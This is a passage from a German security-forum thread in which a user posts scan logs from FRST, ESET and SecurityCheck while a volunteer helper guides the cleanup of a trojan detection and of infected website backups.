2013-12-28 11:55 - 2012-08-20 08:37 - 01490656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdfCoInstaller01007.dll
2013-12-28 11:55 - 2011-12-31 09:20 - 00225920 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbmdm.sys
2013-12-28 11:55 - 2010-10-08 16:59 - 00032768 _____ (Huawei Tech. Co., Ltd.) C:\Windows\system32\Drivers\ewdcsc.sys
2013-12-28 11:55 - 2010-09-26 18:09 - 00022016 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwupgrade.sys
2013-12-28 11:55 - 2010-08-06 07:43 - 01001472 _____ (DiBcom SA) C:\Windows\system32\Drivers\mod7700.sys
2013-12-28 11:55 - 2010-07-27 09:52 - 00117248 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwusbdev.sys
2013-12-28 11:53 - 2013-12-28 11:57 - 00000000 ____D C:\ProgramData\DatacardService
2013-12-23 08:35 - 2013-12-23 08:36 - 14335560 _____ C:\Users\*****\Downloads\flags.zip
2013-12-17 12:17 - 2013-12-17 12:21 - 103312806 _____ C:\Users\*****\Downloads\d012f60a.sql
2013-12-17 12:12 - 2013-12-17 12:12 - 00108255 _____ C:\Users\*****\Downloads\Open_Graph_Protocol_v2.6_j25_unzipfirst.zip
2013-12-17 11:41 - 2013-12-17 12:07 - 00000000 ____D C:\Users\*****\Desktop\mp3

==================== One Month Modified Files and Folders =======

2014-01-15 11:45 - 2014-01-15 11:45 - 00001206 _____ C:\Users\*****\Desktop\JRT.txt
2014-01-15 11:39 - 2014-01-15 11:39 - 00000000 ____D C:\Windows\ERUNT
2014-01-15 11:39 - 2010-12-11 20:50 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-01-15 11:13 - 2009-07-14 05:45 - 00009920 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-01-15 11:13 - 2009-07-14 05:45 - 00009920 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-01-15 11:07 - 2011-07-14 17:03 - 00000000 ____D C:\Users\*****\AppData\Roaming\Dropbox
2014-01-15 11:06 - 2010-12-11 20:50 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-01-15 11:05 - 2010-07-28 14:27 - 00000000 ____D C:\ProgramData\NVIDIA
2014-01-15 11:05 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2014-01-15 11:05 - 2009-07-14 05:51 - 00137925 _____ C:\Windows\setupact.log
2014-01-15 11:04 - 2014-01-15 10:47 - 00000000 ____D C:\AdwCleaner
2014-01-15 11:04 - 2010-07-28 14:21 - 01607546 _____ C:\Windows\WindowsUpdate.log
2014-01-15 10:38 - 2014-01-15 10:38 - 00001688 _____ C:\Users\*****\Desktop\xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx tro.txt
2014-01-15 10:35 - 2014-01-15 10:35 - 01236282 _____ C:\Users\*****\Downloads\adwcleaner.exe
2014-01-15 10:35 - 2014-01-15 10:35 - 01037068 _____ (Thisisu) C:\Users\*****\Downloads\JRT.exe
2014-01-15 10:34 - 2014-01-15 10:34 - 00448512 _____ (OldTimer Tools) C:\Users\*****\Downloads\TFC.exe
2014-01-15 09:39 - 2011-07-14 17:04 - 00000000 ___RD C:\Users\*****\Dropbox
2014-01-15 09:37 - 2009-11-18 23:09 - 00812466 _____ C:\Windows\PFRO.log
2014-01-15 09:05 - 2014-01-15 09:05 - 00001113 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-01-15 09:05 - 2014-01-15 09:05 - 00000000 ____D C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-01-15 09:05 - 2014-01-15 09:04 - 10285040 _____ (Malwarebytes Corporation                                    ) C:\Users\*****\Downloads\mbam-setup-1.75.0.1300.exe
2014-01-15 08:46 - 2014-01-15 08:45 - 00377856 _____ C:\Users\*****\Downloads\gmer_2.1.19163.exe
2014-01-15 08:44 - 2014-01-15 08:44 - 00000000 ____D C:\FRST
2014-01-15 08:44 - 2014-01-15 08:43 - 02076160 _____ (Farbar) C:\Users\*****\Downloads\FRST64.exe
2014-01-15 08:42 - 2014-01-15 08:42 - 00000000 _____ C:\Users\*****\defogger_reenable
2014-01-15 08:42 - 2010-12-11 20:34 - 00000000 ____D C:\Users\*****
2014-01-15 08:41 - 2014-01-15 08:41 - 00050477 _____ C:\Users\*****\Downloads\Defogger.exe
2014-01-14 19:07 - 2010-07-26 14:08 - 00700380 _____ C:\Windows\system32\perfh007.dat
2014-01-14 19:07 - 2010-07-26 14:08 - 00149176 _____ C:\Windows\system32\perfc007.dat
2014-01-14 19:07 - 2009-07-14 06:13 - 01622100 _____ C:\Windows\system32\PerfStringBackup.INI
2014-01-14 18:58 - 2010-12-20 12:28 - 00000000 ____D C:\Users\*****\AppData\Roaming\gSyncit
2014-01-14 18:54 - 2014-01-14 18:26 - 625348608 _____ C:\Users\*****\Downloads\rescue-system.iso
2014-01-14 18:50 - 2014-01-14 18:40 - 121822819 _____ C:\Users\*****\Downloads\avg_arl_ffi_all_120_130801a6481.rar
2014-01-14 18:44 - 2014-01-14 18:44 - 00002952 _____ C:\Users\*****\Downloads\access_log_2013-11-12.gz
2014-01-14 18:42 - 2014-01-14 18:42 - 00002316 _____ C:\Users\*****\Downloads\access_log_2014-01-05.gz
2014-01-14 18:38 - 2014-01-14 18:15 - 00043520 ___SH C:\Users\*****\AppData\Roaming\Thumbs.db
2014-01-14 18:35 - 2014-01-14 18:28 - 112001024 _____ C:\Users\*****\Downloads\avg_arl_cdi_all_120_130801a6481.iso
2014-01-14 18:16 - 2010-12-18 20:23 - 00000000 ____D C:\Users\*****\AppData\Roaming\FileZilla
2014-01-14 18:09 - 2014-01-14 18:09 - 05063616 _____ (PortableApps.com) C:\Users\*****\Downloads\FileZillaPortable_3.7.3.paf.exe
2014-01-14 17:08 - 2011-01-06 16:46 - 00269936 _____ C:\Users\Admin\AppData\Local\GDIPFONTCACHEV1.DAT
2014-01-14 15:32 - 2013-10-19 19:14 - 00000557 _____ C:\Users\*****\Desktop\moooooovie.txt
2014-01-14 15:11 - 2014-01-14 15:11 - 00378099 _____ C:\Users\*****\Downloads\10_246_16_68.sql
2014-01-14 11:04 - 2014-01-14 11:03 - 00000000 ____D C:\Users\*****\Desktop\templates_c
2014-01-13 16:38 - 2013-12-04 17:50 - 00000053 _____ C:\Users\*****\Downloads\google63a169ac443c121d.html
2014-01-13 16:31 - 2014-01-13 16:31 - 01790152 _____ C:\Users\*****\Downloads\com_phocagallery_v3.2.6(1).zip
2014-01-13 15:14 - 2014-01-13 15:13 - 04914782 _____ C:\Users\*****\Downloads\Palettenparade 13  Einladung.zip
2014-01-13 14:04 - 2014-01-13 14:04 - 00000282 _____ C:\Users\*****\Desktop\10 Schritte zum erfolgreichen Facebook-Gewinnspiel Fanpage Karma Blog.URL
2014-01-13 06:48 - 2009-07-14 05:45 - 01348600 _____ C:\Windows\system32\FNTCACHE.DAT
2014-01-12 17:57 - 2013-11-29 20:15 - 00002356 _____ C:\Users\*****\Desktop\kauuuuuuf.txt
2014-01-12 16:53 - 2014-01-12 16:53 - 00000217 _____ C:\Users\*****\Desktop\The Scale of the Universe 2 — Other Languages.URL
2014-01-12 10:56 - 2014-01-12 10:56 - 00028736 _____ C:\Users\*****\Downloads\12_01_2014_WebFTP.zip
2014-01-12 09:24 - 2010-12-11 20:34 - 00269936 _____ C:\Users\*****\AppData\Local\GDIPFONTCACHEV1.DAT
2014-01-12 09:20 - 2014-01-12 09:20 - 00119546 _____ C:\Users\*****\Downloads\droid-serif.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00079700 _____ C:\Users\*****\Downloads\droid-sans-mono.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00011194 _____ C:\Users\*****\Downloads\Droid.zip
2014-01-12 09:19 - 2014-01-12 09:19 - 00211015 _____ C:\Users\*****\Downloads\Droid-Sans.zip
2014-01-11 20:33 - 2014-01-11 20:32 - 00002057 _____ C:\Users\*****\Desktop\configuration.php
2014-01-10 16:38 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\system32\NDF
2014-01-10 11:14 - 2009-07-14 03:34 - 00000531 _____ C:\Windows\win.ini
2014-01-10 10:58 - 2014-01-10 10:58 - 00036115 _____ C:\Users\*****\Downloads\access-2014010821-2014011002.log.gz
2014-01-09 07:10 - 2012-02-07 11:46 - 00001506 _____ C:\Windows\wininit.ini
2014-01-09 07:10 - 2011-07-14 17:04 - 00001025 _____ C:\Users\*****\Desktop\Dropbox.lnk
2014-01-09 07:10 - 2011-07-14 17:03 - 00000000 ____D C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-01-09 07:10 - 2010-12-11 20:35 - 00000000 ___RD C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-01-08 11:52 - 2014-01-08 11:52 - 00002371 _____ C:\Users\*****\Downloads\address.zip
2014-01-08 11:15 - 2014-01-08 11:15 - 00000000 ____D C:\Program Files (x86)\FlippingBook
2014-01-08 11:15 - 2014-01-08 11:13 - 00000000 __HDC C:\ProgramData\{0C886C27-6204-4A3D-8348-A42A59BC7205}
2014-01-08 11:15 - 2013-12-09 14:27 - 00001153 _____ C:\Users\Public\Desktop\FlippingBook Publisher Professional.lnk
2014-01-08 11:14 - 2013-12-09 14:25 - 00000000 __HDC C:\ProgramData\{CA331EC7-0458-49DF-8B26-9E171A9EAE0D}
2014-01-08 11:13 - 2014-01-08 11:13 - 00000000 ____D C:\Users\*****\AppData\Local\III
2014-01-07 19:50 - 2014-01-07 19:50 - 00000233 _____ C:\Users\*****\Desktop\Fly Birds Hd Legendary Birds Legendary Pokemon. Colourful Pheasant Birds Wallpapers. Fly Birds Hd ~ Photoinpixel.URL
2014-01-05 16:21 - 2011-01-03 16:37 - 00000000 ____D C:\Users\*****\AppData\Roaming\Azureus
2014-01-04 19:06 - 2014-01-04 19:06 - 00003714 _____ C:\Users\*****\Desktop\pointclouds - Verknüpfung.lnk
2014-01-04 16:21 - 2013-12-12 14:55 - 00000000 ____D C:\Users\*****\Desktop\löschen_____
2014-01-02 11:26 - 2014-01-02 11:26 - 00000053 _____ C:\Users\*****\Desktop\google63a169ac443c121d.html
2013-12-31 14:08 - 2013-12-31 14:08 - 00000225 _____ C:\Users\*****\Desktop\macklemore album.URL
2013-12-30 20:16 - 2013-12-30 20:11 - 176752984 _____ (VMware, Inc.                                                   ) C:\Users\*****\Downloads\VMware-converter-en-5.5.0-1362012.exe
2013-12-30 08:58 - 2013-12-30 08:54 - 98508144 _____ (VMware, Inc.) C:\Users\*****\Downloads\VMware-player-6.0.1-1379776.exe
2013-12-30 08:35 - 2013-12-30 08:35 - 00409141 _____ C:\Users\*****\Downloads\torbutton146-current.zip
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Roaming\Stellarium
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Local\stellarium
2013-12-29 12:28 - 2013-12-29 12:28 - 00001724 _____ C:\Users\Public\Desktop\Stellarium.lnk
2013-12-29 12:28 - 2013-12-29 12:28 - 00000000 ____D C:\Program Files\Stellarium
2013-12-29 11:24 - 2013-12-29 11:22 - 81699167 _____ (Stellarium team                                             ) C:\Users\*****\Downloads\stellarium-0.12.4-win64.exe
2013-12-28 16:39 - 2013-09-01 18:06 - 00000000 ____D C:\Users\Admin\Desktop\test
2013-12-28 16:39 - 2010-12-23 11:42 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Mozilla
2013-12-28 16:36 - 2010-12-23 11:42 - 00000000 ____D C:\Users\Admin\AppData\Local\Mozilla
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_juextctrl_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jucdcacm_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____D C:\Users\*****\AppData\Roaming\Sierra Wireless
2013-12-28 11:57 - 2013-12-28 11:56 - 00000000 ____D C:\ProgramData\mquadr.at
2013-12-28 11:57 - 2013-12-28 11:53 - 00000000 ____D C:\ProgramData\DatacardService
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jubusenum_01007.Wdf
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____D C:\Users\*****\AppData\Local\mquadr.at
2013-12-28 11:55 - 2013-12-28 11:55 - 00001163 _____ C:\Users\Public\Desktop\3InternetManager.lnk
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 __HDC C:\ProgramData\{A48B2592-413B-41AB-8710-5543CB7481EC}
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\ProgramData\H3G
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\Program Files (x86)\3InternetManager
2013-12-26 18:07 - 2013-09-26 18:33 - 00000000 ____D C:\Users\*****\Desktop\Stadtkrug Dropbox Lager brennen
2013-12-23 08:36 - 2013-12-23 08:35 - 14335560 _____ C:\Users\*****\Downloads\flags.zip
2013-12-22 12:18 - 2013-12-08 11:17 - 00001094 _____ C:\Users\Public\Desktop\TeamViewer 9.lnk
2013-12-19 11:41 - 2009-11-18 22:56 - 00000000 ____D C:\Program Files (x86)\Google
2013-12-17 20:00 - 2010-12-11 20:47 - 00000000 ____D C:\Users\*****\AppData\Roaming\Adobe
2013-12-17 12:21 - 2013-12-17 12:17 - 103312806 _____ C:\Users\*****\Downloads\d012f60a.sql
2013-12-17 12:12 - 2013-12-17 12:12 - 00108255 _____ C:\Users\*****\Downloads\Open_Graph_Protocol_v2.6_j25_unzipfirst.zip
2013-12-17 12:07 - 2013-12-17 11:41 - 00000000 ____D C:\Users\*****\Desktop\mp3
2013-12-16 09:17 - 2010-12-25 15:48 - 00001998 ____H C:\Users\*****\Documents\Default.rdp

Some content of TEMP:
====================
C:\Users\*****\AppData\Local\Temp\Quarantine.exe


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-01-09 07:35

==================== End Of Log ============================
         
--- --- ---

--- --- ---
__________________

Alt 16.01.2014, 08:36   #4
schrauber
/// the machine
/// TB-Ausbilder
 

TR/Crypt.Xpack.41536 in der Outlook .pst - Standard

TR/Crypt.Xpack.41536 in der Outlook .pst




ESET Online Scanner

  • Hier findest du eine bebilderte Anleitung zu ESET Online Scanner
  • Lade und starte Eset Online Scanner
  • Setze einen Haken bei Ja, ich bin mit den Nutzungsbedingungen einverstanden und klicke auf Starten.
  • Aktiviere die "Erkennung von eventuell unerwünschten Anwendungen" und wähle folgende Einstellungen.
  • Klicke auf Starten.
  • Die Signaturen werden heruntergeladen, der Scan beginnt automatisch.
  • Klicke am Ende des Suchlaufs auf Fertig stellen.
  • Schließe das Fenster von ESET.
  • Explorer öffnen.
  • C:\Programme\Eset\EsetOnlineScanner\log.txt (bei 64 Bit auch C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) suchen und mit Deinem Editor öffnen (bebildert).
  • Logfile hier posten.
  • Deinstallation: Systemsteuerung => Software / Programme deinstallieren => Eset Online Scanner V3 entfernen.
  • Manuell folgenden Ordner löschen und Papierkorb leeren => C:\Programme\Eset


Downloade Dir bitte SecurityCheck und:

  • Speichere es auf dem Desktop.
  • Starte SecurityCheck.exe und folge den Anweisungen in der DOS-Box.
  • Wenn der Scan beendet wurde sollte sich ein Textdokument (checkup.txt) öffnen.
Poste den Inhalt bitte hier.

und ein frisches FRST log bitte. Noch Probleme?
__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009

Spenden
Anleitungen und Hilfestellungen
Trojaner-Board Facebook-Seite

Keine Hilfestellung via PM!

Alt 17.01.2014, 08:00   #5
franz12
 
TR/Crypt.Xpack.41536 in der Outlook .pst - Standard

TR/Crypt.Xpack.41536 in der Outlook .pst



Danke! Es läuft alles problemlos. Es bleibt nur die Sorge, ob nicht doch noch jemand auf dem PC ist. Hier die Logs:

ESET
Code:
ATTFilter
ESETSmartInstaller@High as downloader log:
Can not open internetESETSmartInstaller@High as downloader log:
Can not open internetCan not open internetESETSmartInstaller@High as downloader log:
Can not open internetCan not open internetESETSmartInstaller@High as downloader log:
Can not open internet# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6920
# api_version=3.0.2
# EOSSerial=f1b14229420287489037af2480ce8a99
# engine=16673
# end=stopped
# remove_checked=false
# archives_checked=true
# unwanted_checked=false
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2014-01-16 11:39:05
# local_time=2014-01-16 12:39:05 (+0100, Mitteleuropäische Zeit)
# country="Germany"
# lang=1033
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode=5893 16776574 100 94 16350873 141502195 0 0
# scanned=260275
# found=0
# cleaned=0
# scan_time=6114
ESETSmartInstaller@High as downloader log:
all ok
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6920
# api_version=3.0.2
# EOSSerial=f1b14229420287489037af2480ce8a99
# engine=16682
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=false
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2014-01-17 05:02:55
# local_time=2014-01-17 06:02:55 (+0100, Mitteleuropäische Zeit)
# country="Germany"
# lang=1033
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode=5893 16776574 100 94 16413503 141564825 0 0
# scanned=2656904
# found=105
# cleaned=0
# scan_time=35198

Es wurden nur JS/TrojanDownloader.Agent.NSA trojan in den backup files der gehackten websites gefunden (.js). Aber das war mir klar. Ich habe die Zeilen gelöscht, weil zu viele Namen darin vorkommen.

sh=CB96C5E165BF209BE876FAD98C7E828D29395F0B ft=0 fh=0000000000000000 vn="JS/TrojanDownloader.Agent.NSA trojan" ac=I fn="G:\****\web 2013\cgi-bin\newgeocheck.js"

usw....
         
SecurityCheck
Code:
ATTFilter
 Results of screen317's Security Check version 0.99.78  
 Windows 7 Service Pack 1 x64 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
Microsoft Security Essentials   
  (On Access scanning disabled!) 
 Error obtaining update status for antivirus!  
`````````Anti-malware/Other Utilities Check:````````` 
 Thumbnail Generator by Disable Spyware 
 Malwarebytes Anti-Malware Version 1.75.0.1300  
 Java 7 Update 45  
 Adobe Flash Player 11.9.900.170  
 Adobe Reader XI  
 Mozilla Firefox (26.0) 
 Mozilla Thunderbird (3.1.9) Thunderbird out of Date!  
 Google Chrome 31.0.1650.63  
 Google Chrome 32.0.1700.76  
````````Process Check: objlist.exe by Laurent````````  
 Microsoft Security Essentials MSMpEng.exe 
 Microsoft Security Essentials msseces.exe 
 Malwarebytes Anti-Malware mbamservice.exe  
 Malwarebytes Anti-Malware mbamgui.exe  
 Malwarebytes' Anti-Malware mbamscheduler.exe   
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C:  
````````````````````End of Log``````````````````````
         
FRST

FRST Logfile:

FRST Logfile:
Code:
ATTFilter
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 15-01-2014
Ran by ***** (administrator) on *****-PC on 17-01-2014 07:40:47
Running from G:\Users\*****\Documents\*****\Hacker 2014 01\trojaner-board.de
Windows 7 Home Premium Service Pack 1 (X64) OS Language: German Standard
Internet Explorer Version 11
Boot Mode: Normal

The only official downoad link fo FRST:
Download link for 32-Bit version: hxxp://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ 
Download link for 64-Bit Version: hxxp://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ 
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSvc.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements Organizer 8.0\PhotoshopElementsFileAgent.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\avmike.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\certsrv.exe
(Devguru Co., Ltd.) C:\Windows\SysWOW64\dgdersvc.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\esClient.exe
() C:\HS3 Hotelsoftware\DB-Server\bin\fbguard_hs3sr.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Registration\GregHSRW.exe
(Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe
() C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\data\database\bin\mysqld-nt.exe
() C:\ProgramData\DatacardService\HWDeviceService64.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\MWLService.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\nwtsrv.exe
() C:\Program Files (x86)\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe
(Acer) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
() C:\OEM\USBDECTION\USBS3S4Detection.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\Microsoft.HomeServer.Archive.TransferService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\WHSConnector.exe
(Firebird Project) C:\HS3 Hotelsoftware\DB-Server\bin\fbserver_hs3sr.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\mwlDaemon.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe
(Microsoft Corporation) C:\Windows\vVX1000.exe
(Microsoft Corporation) C:\Windows\WindowsMobile\wmdc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Google Inc.) C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
() C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyUtility.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec Egis Software Update\EgisUpdate.exe
(CyberLink Corp.) C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\ArcadeDeluxeAgent.exe
(Acer Corp.) C:\Program Files (x86)\Acer Arcade Deluxe\PlayMovie\PMVService.exe
(Adobe Sytems Incorporated) C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Distillr\acrotray.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe
(Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\ControlCenter3\BrccMCtl.exe
(Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TimounterMonitor.exe
(Google) C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe
() C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Audible, Inc.) C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe
() C:\Program Files (x86)\Northstar\SmartCopy\SmartCopy.exe
(North Star com.) C:\Program Files (x86)\Northstar\SmartLauncher\SmartLauncher.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\WHSTrayApp.exe
(pdfforge  hxxp://www.pdfforge.org/) C:\Program Files (x86)\Common Files\PDFCreator\PDFCreator.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Hauppauge Computer Works, Inc.) C:\Program Files (x86)\WinTV\WinTV7\WinTVTray.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfimon.exe
(Dropbox, Inc.) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(TrueCrypt Foundation) C:\Program Files\TrueCrypt\TrueCrypt.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe
(Helios Software Solutions) C:\Program Files (x86)\TextPad 4\TextPad.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_11_9_900_170.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_11_9_900_170.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [mwlDaemon] - C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\mwlDaemon.exe [349480 2009-09-10] (Egis Technology Inc.)
HKLM\...\Run: [IAAnotif] - C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe [186904 2009-10-13] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] - C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [8312352 2009-10-28] (Realtek Semiconductor)
HKLM\...\Run: [OOTag] - C:\windows\oobeoffer\oobeoffer\ootag.exe [23072 2009-09-28] (Microsoft)
HKLM\...\Run: [Acronis Scheduler2 Service] - C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe [140568 2007-08-31] (Acronis)
HKLM\...\Run: [VX1000] - C:\Windows\vVX1000.exe [762736 2010-05-20] (Microsoft Corporation)
HKLM\...\Run: [Windows Mobile Device Center] - C:\Windows\WindowsMobile\wmdc.exe [660360 2007-05-31] (Microsoft Corporation)
HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1266912 2013-10-23] (Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [472992 2013-03-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [JMB36X IDE Setup] - C:\Windows\RaidTool\xInsIDE.exe [36864 2007-03-20] ()
